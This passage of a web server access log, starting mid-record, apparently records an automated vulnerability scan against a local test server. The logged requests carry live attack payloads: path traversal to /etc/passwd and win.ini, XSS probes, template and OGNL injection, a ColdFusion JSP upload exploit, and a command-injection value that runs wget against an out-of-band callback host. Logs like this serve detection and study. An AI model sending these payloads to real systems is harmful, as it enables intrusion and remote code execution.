+0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /test.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.289","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/altair/images/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.306","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.623","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/37 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.337","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.children....4.2.1....json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.004","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%c0 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.621","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.270","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /dns-query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.987","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /files/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.372","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.328","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v1/graphql-explorer HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.366","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /awstats/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.240","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /solr/admin/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.326","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2Fc9oms3gsmpve1ijt0mc0fdaznmeksth3s.oast.live%3B%60%3B%23&password=asd&lang_select=en","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.243","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.375","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.376","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/38 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.286","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.297","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /elocker_old/storage/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.388","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.360","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /openam/ui/PWResetUserValidation HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.279","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.390","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /am/UI/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.294","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wfc/portal HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.629","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"username=showdoc&password=123456&v_code=","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /server/index.php?s=/api/user/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.300","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.292","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-----------------------------24464570528145\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2228fHqOB4tTlnVAFPDEumeyWakRP.jsp\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%@ page import=\x22java.security.MessageDigest\x22%>\x0D\x0A<%\x0D\x0AString cve = \x22CVE-2018-15961\x22;\x0D\x0AMessageDigest alg = MessageDigest.getInstance(\x22MD5\x22);\x0D\x0Aalg.reset();\x0D\x0Aalg.update(cve.getBytes());\x0D\x0Abyte[] digest = alg.digest();\x0D\x0AStringBuffer hashedpasswd = new StringBuffer();\x0D\x0AString hx;\x0D\x0Afor (int i=0;i\x0D\x0A-----------------------------24464570528145\x0D\x0AContent-Disposition: form-data; name=\x22path\x22\x0D\x0A\x0D\x0A28fHqOB4tTlnVAFPDEumeyWakRP.jsp\x0D\x0A-----------------------------24464570528145--\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.346","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/apcupsd/multimon.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.776","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v1/graphql.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.361","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"step=1&Language=de{${system(\x22ls\x22)}}&NextBtn=Weiter+%3E","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /mailingupgrade.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.355","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /awstats.conf HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.359","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/39 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.266","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.269","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.271","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.344","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /OpenAM-11.0.0/ui/PWResetUserValidation HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.343","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /28fHqLFUfWFG3InZpkNjB5rNMry HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.652","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET //%5C/%5C/example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.004","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /goforms/rlminfo HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.380","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.356","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /revive/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.295","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Electron/download/windows/..%5C..%5C..%5CHttp%5Cwebroot%5Cconfig.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.953","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v1/graphql/console HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.281","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.266","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.267","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/28fHqOB4tTlnVAFPDEumeyWakRP.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.364","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.366","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /dumpmdm.cmd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.004","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /icons/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.346","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/40 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.337","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.074","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /config/packages/security.yaml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.340","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.405","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.376","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v1/graphql/schema.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.258","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET //%5C/example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.369","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Electron/download/windows/%5Cwindows%5Cwin.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.327","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:01 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.293","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} 